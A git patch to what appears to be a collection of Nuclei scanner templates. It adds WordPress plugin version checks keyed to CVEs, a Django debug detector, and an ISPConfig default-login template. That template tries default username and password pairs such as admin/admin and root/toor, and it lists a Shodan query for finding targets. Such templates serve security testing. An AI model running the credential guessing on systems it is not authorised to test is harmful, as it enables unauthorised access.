From 2eb80d1fa79a27e1d2b08753c952c37543af9b33 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 25 Aug 2024 12:34:37 +0000 Subject: [PATCH] 20240825 --- date.txt | 2 +- poc.txt | 20 +++++ poc/auth/ispconfig-default-login.yaml | 63 +++++++++++++++ poc/config/ispconfig-default-login.yaml | 63 +++++++++++++++ .../django-debug-exposure-csrf.yaml | 18 ++--- poc/cve/CVE-2023-0926.yaml | 59 ++++++++++++++ poc/cve/CVE-2023-6987.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-2254.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6493.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6499.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6617.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6631.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6665.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6667.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-7351.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-7568.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-7656.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-8120.yaml | 59 ++++++++++++++ poc/cve/cve-2008-5587.yaml | 19 ++--- poc/cve/cve-2017-14524.yaml | 42 +++++++--- poc/cve/cve-2018-1271.yaml | 16 ++-- poc/cve/cve-2018-15473.yaml | 14 ++-- poc/cve/cve-2018-15535.yaml | 21 ++--- poc/default/ispconfig-default-login.yaml | 63 +++++++++++++++ poc/detect/wowza-streaming-detect.yaml | 6 +- poc/favicon/favicon-generator.yaml | 59 ++++++++++++++ poc/header/header-footer-code.yaml | 59 ++++++++++++++ poc/header/log4j-header.yaml | 81 +++++++++++++++++-- poc/http/cl-te-http-smuggling.yaml | 72 ++++++++--------- .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +++++---- .../Hikvision_iVMS-8700_Fileupload_Files.yaml | 17 ++-- poc/microsoft/Hikvision_iVMS-8700_upload.yaml | 45 +++-------- .../Hikvision_iVMS-8700_upload_action.yaml | 45 ++++++++--- .../dahua-wpms-addimgico-fileupload.yaml | 78 +++++++++++------- poc/other/Dahua_getUserInfoByUserName.yaml | 18 +++-- .../Hikvision_Env_Information_Leakage.yaml | 47 ++++------- poc/other/Ruijie_EXCU_SHELL.yaml | 30 ++++--- poc/other/devvn-image-hotspot.yaml | 59 ++++++++++++++ poc/other/kbucket.yaml | 59 ++++++++++++++ .../spring-functions-rce.yaml | 70 ++++++++-------- .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +++++---- .../Hikvision_iVMS-8700_Fileupload_Files.yaml | 17 ++-- poc/upload/Hikvision_iVMS-8700_upload.yaml | 45 +++-------- .../Hikvision_iVMS-8700_upload_action.yaml | 45 ++++++++--- .../dahua-wpms-addimgico-fileupload.yaml | 78 +++++++++++------- ...ecology_E-Office_Uploadify_FileUpload.yaml | 51 +++++------- poc/upload/ecology_E-Office_upload.yaml | 49 +++-------- .../dahua-wpms-addimgico-fileupload.yaml | 78 +++++++++++------- 48 files changed, 1811 insertions(+), 479 deletions(-) create mode 100644 poc/auth/ispconfig-default-login.yaml create mode 100644 poc/config/ispconfig-default-login.yaml create mode 100644 poc/cve/CVE-2023-0926.yaml create mode 100644 poc/cve/CVE-2023-6987.yaml create mode 100644 poc/cve/CVE-2024-2254.yaml create mode 100644 poc/cve/CVE-2024-6493.yaml create mode 100644 poc/cve/CVE-2024-6499.yaml create mode 100644 poc/cve/CVE-2024-6617.yaml create mode 100644 poc/cve/CVE-2024-6631.yaml create mode 100644 poc/cve/CVE-2024-6665.yaml create mode 100644 poc/cve/CVE-2024-6667.yaml create mode 100644 poc/cve/CVE-2024-7351.yaml create mode 100644 poc/cve/CVE-2024-7568.yaml create mode 100644 poc/cve/CVE-2024-7656.yaml create mode 100644 poc/cve/CVE-2024-8120.yaml create mode 100644 poc/default/ispconfig-default-login.yaml create mode 100644 poc/favicon/favicon-generator.yaml create mode 100644 poc/header/header-footer-code.yaml create mode 100644 poc/other/devvn-image-hotspot.yaml create mode 100644 poc/other/kbucket.yaml diff --git a/date.txt b/date.txt index 8df515083d..928d43e6af 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240824 +20240825 diff --git a/poc.txt b/poc.txt index 24f176830a..101eeea9f7 100644 --- a/poc.txt +++ b/poc.txt @@ -3345,6 +3345,7 @@ ./poc/auth/iptime-default-login-8193.yaml ./poc/auth/iptime-default-login-8194.yaml ./poc/auth/iptime-default-login.yaml +./poc/auth/ispconfig-default-login.yaml ./poc/auth/issabel-login.yaml ./poc/auth/iubenda-cookie-law-solution-0f838161174c3a1452a42342cb556b62.yaml ./poc/auth/iubenda-cookie-law-solution-4353c7e138ff4cafc852aa03c1df2812.yaml @@ -7432,6 +7433,7 @@ ./poc/config/insecure-cors-configuration.yaml ./poc/config/insecure-network-security-config.yaml ./poc/config/insecure_transport_networksecurityconfig.yaml +./poc/config/ispconfig-default-login.yaml ./poc/config/ispconfig.yaml ./poc/config/joomla-config-dist-file.yaml ./poc/config/joomla-config-file-8374.yaml @@ -23803,6 +23805,7 @@ ./poc/cve/CVE-2023-0924-5f6349523fa3681f3fb3dddd26ea40cb.yaml ./poc/cve/CVE-2023-0924.yaml ./poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml +./poc/cve/CVE-2023-0926.yaml ./poc/cve/CVE-2023-0937-710621abe5c27a3f4d488a85b84e167f.yaml ./poc/cve/CVE-2023-0937.yaml ./poc/cve/CVE-2023-0940-68c8a812a7f4d3db6d4f04bb90d0d9a4.yaml @@ -32365,6 +32368,7 @@ ./poc/cve/CVE-2023-6986-40ce27a126a874a6f061b95c0f565f63.yaml ./poc/cve/CVE-2023-6986.yaml ./poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml +./poc/cve/CVE-2023-6987.yaml ./poc/cve/CVE-2023-6988-159f07c88d3476750318c076d61454ef.yaml ./poc/cve/CVE-2023-6988.yaml ./poc/cve/CVE-2023-6989-f3e101de1aabc79baa4bde571ba04314.yaml @@ -34365,6 +34369,7 @@ ./poc/cve/CVE-2024-2253-e80d4914f56d0bcf3f9f3038bce09c0d.yaml ./poc/cve/CVE-2024-2253.yaml ./poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml +./poc/cve/CVE-2024-2254.yaml ./poc/cve/CVE-2024-2255-c91737673f0c0121f5550bad7a472ece.yaml ./poc/cve/CVE-2024-2255.yaml ./poc/cve/CVE-2024-2256-baa716bf2c82d44f12eb5944a7db627c.yaml @@ -41689,6 +41694,7 @@ ./poc/cve/CVE-2024-6491-077c7077f2470ec50c66a49785e52870.yaml ./poc/cve/CVE-2024-6491.yaml ./poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml +./poc/cve/CVE-2024-6493.yaml ./poc/cve/CVE-2024-6494-1f03219d59ff7e715b118bf84690f350.yaml ./poc/cve/CVE-2024-6494.yaml ./poc/cve/CVE-2024-6495-7f7d4d9be9d13fb4035edaa3d3829c0a.yaml @@ -41700,6 +41706,7 @@ ./poc/cve/CVE-2024-6498-2ab2ecf188af29e491c09cc5e16d6c6a.yaml ./poc/cve/CVE-2024-6498.yaml ./poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml +./poc/cve/CVE-2024-6499.yaml ./poc/cve/CVE-2024-6500-76d6d82cf0d857f1f99bb5f0649b9e93.yaml ./poc/cve/CVE-2024-6500-e8578bf41793cff7e63bbe53d1903e0e.yaml ./poc/cve/CVE-2024-6500.yaml @@ -41782,6 +41789,7 @@ ./poc/cve/CVE-2024-6599-aa457f52df54a859bbebb756c962b901.yaml ./poc/cve/CVE-2024-6599.yaml ./poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml +./poc/cve/CVE-2024-6617.yaml ./poc/cve/CVE-2024-6621-02b2446a68489e575b652c2201b7d541.yaml ./poc/cve/CVE-2024-6621.yaml ./poc/cve/CVE-2024-6624-3e8f54a8f5a599fccb32276f2c459503.yaml @@ -41793,6 +41801,7 @@ ./poc/cve/CVE-2024-6629-d16f070910ae811c719a92ea7113c3c7.yaml ./poc/cve/CVE-2024-6629.yaml ./poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml +./poc/cve/CVE-2024-6631.yaml ./poc/cve/CVE-2024-6634-1294d62a2e83c6ca71566c3b267c34d2.yaml ./poc/cve/CVE-2024-6634.yaml ./poc/cve/CVE-2024-6635-0f3174f37f221bf395fa03e4aca4837b.yaml @@ -41810,9 +41819,11 @@ ./poc/cve/CVE-2024-6661-865ee81f979d667850ff2bc7887f6239.yaml ./poc/cve/CVE-2024-6661.yaml ./poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml +./poc/cve/CVE-2024-6665.yaml ./poc/cve/CVE-2024-6666-f524b500b74a1c90be50f56d9d664783.yaml ./poc/cve/CVE-2024-6666.yaml ./poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml +./poc/cve/CVE-2024-6667.yaml ./poc/cve/CVE-2024-6668-6a6e2b0e2761e93d3ce06e929012b06f.yaml ./poc/cve/CVE-2024-6668.yaml ./poc/cve/CVE-2024-6669-1f8f47157f2608b3fb02a0319a35eb1c.yaml @@ -41999,6 +42010,7 @@ ./poc/cve/CVE-2024-7350-fae9f5c8afaa9888e7d61c55abf3bb9e.yaml ./poc/cve/CVE-2024-7350.yaml ./poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml +./poc/cve/CVE-2024-7351.yaml ./poc/cve/CVE-2024-7353-51d3774cc31ba9c09e3ef4a4a7c21d55.yaml ./poc/cve/CVE-2024-7353.yaml ./poc/cve/CVE-2024-7355-464a77ba558154888cf73a5cab0a6cc4.yaml @@ -42054,6 +42066,7 @@ ./poc/cve/CVE-2024-7561-dd941493ec03049c383c879de09e421d.yaml ./poc/cve/CVE-2024-7561.yaml ./poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml +./poc/cve/CVE-2024-7568.yaml ./poc/cve/CVE-2024-7574-003dab2f041ca334b519548f81f66762.yaml ./poc/cve/CVE-2024-7574.yaml ./poc/cve/CVE-2024-7588-72d4c65f8b4a3c39e85f33895621e123.yaml @@ -42080,6 +42093,7 @@ ./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml ./poc/cve/CVE-2024-7651.yaml ./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml +./poc/cve/CVE-2024-7656.yaml ./poc/cve/CVE-2024-7689-f3a5e607572c3ebe82d6cfc65f846263.yaml ./poc/cve/CVE-2024-7689.yaml ./poc/cve/CVE-2024-7690-8d65eb5cdc8a149b1d94856146905574.yaml @@ -42113,6 +42127,7 @@ ./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml ./poc/cve/CVE-2024-7854.yaml ./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml +./poc/cve/CVE-2024-8120.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -50374,6 +50389,7 @@ ./poc/default/iptime-default-login-8193.yaml ./poc/default/iptime-default-login-8194.yaml ./poc/default/iptime-default-login.yaml +./poc/default/ispconfig-default-login.yaml ./poc/default/jboss-default-password.yaml ./poc/default/jboss-jbpm-default-login.yaml ./poc/default/jeedom-default-login.yaml @@ -54147,6 +54163,7 @@ ./poc/favicon/favicon-detection-7446.yaml ./poc/favicon/favicon-detection.yaml ./poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml +./poc/favicon/favicon-generator.yaml ./poc/favicon/favicon-rotator-6f8bd28dbfbd78a39c26211650d54ded.yaml ./poc/favicon/favicon-rotator.yaml ./poc/favicon/favicon-switcher-87d4523b4710268d91b0abc72f0e31c5.yaml @@ -55695,6 +55712,7 @@ ./poc/header/header-footer-code-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/header/header-footer-code-manager-plugin.yaml ./poc/header/header-footer-code-manager.yaml +./poc/header/header-footer-code.yaml ./poc/header/header-footer-elementor-13cbbdbbd61a4c045ef2ff7386dfb654.yaml ./poc/header/header-footer-elementor-13cd3c728a036abc42340e590babbe8b.yaml ./poc/header/header-footer-elementor-232faaa29b050dd09edb1a0a86fedae0.yaml @@ -69420,6 +69438,7 @@ ./poc/other/devrant.yaml ./poc/other/devto.yaml ./poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml +./poc/other/devvn-image-hotspot.yaml ./poc/other/dexs-pm-system-868efdaccc5f16808a6fb06fe3a1cbec.yaml ./poc/other/dexs-pm-system-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/dexs-pm-system-f0982fd918eb9ba0d5bc8bd0faec3225.yaml @@ -76884,6 +76903,7 @@ ./poc/other/kbslider-plugin.yaml ./poc/other/kbslider.yaml ./poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml +./poc/other/kbucket.yaml ./poc/other/kd-coming-soon-2265a234dfded05f01d36b926bceb429.yaml ./poc/other/kd-coming-soon.yaml ./poc/other/kedacom-dvr接入网关.yaml diff --git a/poc/auth/ispconfig-default-login.yaml b/poc/auth/ispconfig-default-login.yaml new file mode 100644 index 0000000000..8151c6d669 --- /dev/null +++ b/poc/auth/ispconfig-default-login.yaml @@ -0,0 +1,63 @@ +id: ispconfig-default-login + +info: + name: ISPConfig - Default Password + author: pussycat0x + severity: high + description: | + ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + max-request: 9 + shodan-query: "http.title:\"ispconfig\"" + tags: default-login,ispconfig + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Connection: close + Referer: {{RootURL}}/login/ + + username={{username}}&password={{password}}&s_mod=login&s_pg=index + + - | + GET /sites/web_vhost_domain_list.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}}/index.php + + attack: pitchfork + payloads: + username: + - 'admin' + - 'guest' + - 'root' + password: + - 'admin' + - 'password' + - 'toor' + + stop-at-first-match: true + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - Tools + - Websites + condition: and + + - type: status + status: + - 200 +# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/config/ispconfig-default-login.yaml b/poc/config/ispconfig-default-login.yaml new file mode 100644 index 0000000000..8151c6d669 --- /dev/null +++ b/poc/config/ispconfig-default-login.yaml @@ -0,0 +1,63 @@ +id: ispconfig-default-login + +info: + name: ISPConfig - Default Password + author: pussycat0x + severity: high + description: | + ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + max-request: 9 + shodan-query: "http.title:\"ispconfig\"" + tags: default-login,ispconfig + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Connection: close + Referer: {{RootURL}}/login/ + + username={{username}}&password={{password}}&s_mod=login&s_pg=index + + - | + GET /sites/web_vhost_domain_list.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}}/index.php + + attack: pitchfork + payloads: + username: + - 'admin' + - 'guest' + - 'root' + password: + - 'admin' + - 'password' + - 'toor' + + stop-at-first-match: true + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - Tools + - Websites + condition: and + + - type: status + status: + - 200 +# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml b/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml index 05a39f47be..3a8d38d44e 100644 --- a/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml +++ b/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml @@ -1,25 +1,25 @@ id: django-debug-exposure + info: name: Django Debug Exposure - author: geeknik - severity: high - reference: - - https://twitter.com/Alra3ees/status/1397660633928286208 + author: shelled + severity: medium tags: django,exposure + requests: - method: POST path: - "{{BaseURL}}/admin/login/?next=/admin/" + matchers-condition: and matchers: - type: status status: - - 500 + - 403 + - type: word part: body words: - - "DB_HOST" - - "DB_NAME" - - "DJANGO" - - "ADMIN_PASSWORD" + - 'seeing the help section of this page because you have DEBUG =' + - 'True' condition: and diff --git a/poc/cve/CVE-2023-0926.yaml b/poc/cve/CVE-2023-0926.yaml new file mode 100644 index 0000000000..71f35cdb7d --- /dev/null +++ b/poc/cve/CVE-2023-0926.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-0926 + +info: + name: > + Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2023-0926 + metadata: + fofa-query: "wp-content/plugins/custom-permalinks/" + google-query: inurl:"/wp-content/plugins/custom-permalinks/" + shodan-query: 'vuln:CVE-2023-0926' + tags: cve,wordpress,wp-plugin,custom-permalinks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-permalinks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2023-6987.yaml b/poc/cve/CVE-2023-6987.yaml new file mode 100644 index 0000000000..83d64bf9e2 --- /dev/null +++ b/poc/cve/CVE-2023-6987.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-6987 + +info: + name: > + String Locator <= 2.6.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The String locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sql-column' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This required WP_DEBUG to be enabled in order to be exploited. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/18e0140e-ac24-48c6-aea0-bb0da203a817?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-6987 + metadata: + fofa-query: "wp-content/plugins/string-locator/" + google-query: inurl:"/wp-content/plugins/string-locator/" + shodan-query: 'vuln:CVE-2023-6987' + tags: cve,wordpress,wp-plugin,string-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/string-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "string-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-2254.yaml b/poc/cve/CVE-2024-2254.yaml new file mode 100644 index 0000000000..17586a8c3d --- /dev/null +++ b/poc/cve/CVE-2024-2254.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-2254 + +info: + name: > + RT Easy Builder – Advanced addons for Elementor <= 2.2 - Authenticated (Contributor+) Stored Cross-site Scripting + author: topscoder + severity: low + description: > + The RT Easy Builder – Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-2254 + metadata: + fofa-query: "wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-2254' + tags: cve,wordpress,wp-plugin,rt-easy-builder-advanced-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rt-easy-builder-advanced-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6493.yaml b/poc/cve/CVE-2024-6493.yaml new file mode 100644 index 0000000000..6d1ffe5b8f --- /dev/null +++ b/poc/cve/CVE-2024-6493.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6493 + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The NinjaTeam Header Footer Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3256da87-0d37-4c8f-9bac-95e3017e35d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6493 + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:CVE-2024-6493' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6499.yaml b/poc/cve/CVE-2024-6499.yaml new file mode 100644 index 0000000000..508f8e11d2 --- /dev/null +++ b/poc/cve/CVE-2024-6499.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6499 + +info: + name: > + WordPress Button Plugin MaxButtons <= 9.7.8 - Full Path Disclosure + author: topscoder + severity: medium + description: > + The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 9.7.8. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6499 + metadata: + fofa-query: "wp-content/plugins/maxbuttons/" + google-query: inurl:"/wp-content/plugins/maxbuttons/" + shodan-query: 'vuln:CVE-2024-6499' + tags: cve,wordpress,wp-plugin,maxbuttons,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/maxbuttons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "maxbuttons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.7.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6617.yaml b/poc/cve/CVE-2024-6617.yaml new file mode 100644 index 0000000000..d56f4f7aed --- /dev/null +++ b/poc/cve/CVE-2024-6617.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6617 + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting via CSS Styles + author: topscoder + severity: low + description: > + The NinjaTeam Header Footer Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via CSS styles in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/521af15c-983c-49dc-a90b-b090281db78a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6617 + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:CVE-2024-6617' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6631.yaml b/poc/cve/CVE-2024-6631.yaml new file mode 100644 index 0000000000..f5b7eac6ef --- /dev/null +++ b/poc/cve/CVE-2024-6631.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6631 + +info: + name: > + ImageRecycle pdf & image compression <= 3.1.14 - Missing Authorization in Several AJAX Actions + author: topscoder + severity: low + description: > + The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 3.1.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform unauthorized actions, such as updating plugin settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N + cvss-score: 5 + cve-id: CVE-2024-6631 + metadata: + fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/" + google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/" + shodan-query: 'vuln:CVE-2024-6631' + tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - 